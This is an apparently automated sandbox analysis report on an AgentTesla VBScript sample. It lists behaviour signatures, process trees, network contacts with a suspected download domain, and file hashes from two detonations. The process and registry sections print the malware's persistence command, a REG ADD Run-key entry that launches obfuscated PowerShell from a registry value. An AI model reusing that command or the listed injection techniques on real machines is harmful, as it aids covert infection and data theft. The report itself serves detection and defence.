Analysis Overview
SHA256: af46cfe7a8d2968846d0ae4ea5b3b36f91f37cf4195f781155e95c4e20696f85
Threat Level: Known bad
The file Doc09876545678.vbs was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Checks computer location settings
Looks up external IP address via web service
Adds Run key to start application
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Modifies registry key
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-06-03 06:47
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-06-03 06:47
Reported: 2024-06-03 06:49
Platform: win7-20240221-en
Max time kernel: 144s
Max time network: 149s
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cuichunchulli = "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\\Jalopy\\').nyansat;%Frbiddene% ($Gylpet)" | C:\Windows\SysWOW64\reg.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2916 set thread context of 896 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Doc09876545678.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drhhmarketing.com | udp |
| US | 104.21.39.61:443 | drhhmarketing.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.63.101.153:80 | apps.identrust.com | tcp |
| US | 104.21.39.61:443 | drhhmarketing.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab55D0.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\Local\Temp\Tar56EF.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BVTU59DVDGB45I7ZNNXF.temp
C:\Users\Admin\AppData\Roaming\prefulgency.Sto
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Analysis: behavioral2
Detonation Overview
Submitted: 2024-06-03 06:47
Reported: 2024-06-03 06:49
Platform: win10v2004-20240508-en
Max time kernel: 148s
Max time network: 145s
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cuichunchulli = "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\\Jalopy\\').nyansat;%Frbiddene% ($Gylpet)" | C:\Windows\SysWOW64\reg.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3804 set thread context of 4364 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Doc09876545678.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drhhmarketing.com | udp |
| US | 104.21.39.61:443 | drhhmarketing.com | tcp |
| US | 8.8.8.8:53 | 61.39.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 104.21.39.61:443 | drhhmarketing.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3kovfzfb.5nl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\prefulgency.Sto
| MD5 | 4a4d70fe78c5f12946b4676950b00e8a |
| SHA1 | 1d7977005546ad74ee56f36552c7aaef6c8dae20 |
| SHA256 | 934c5a21da47652be278d09678d6fc16f3f3c4639bddd33c509d9b6bb024bf3f |
| SHA512 | 884f9bdd26b979f18c73280fc9270293e0b0c0a14094f8f47c74c8c08d8f033f9ff179269cc608f28097ed270c8491adf8510c512d7bcd8988c7d75e4e3c8def |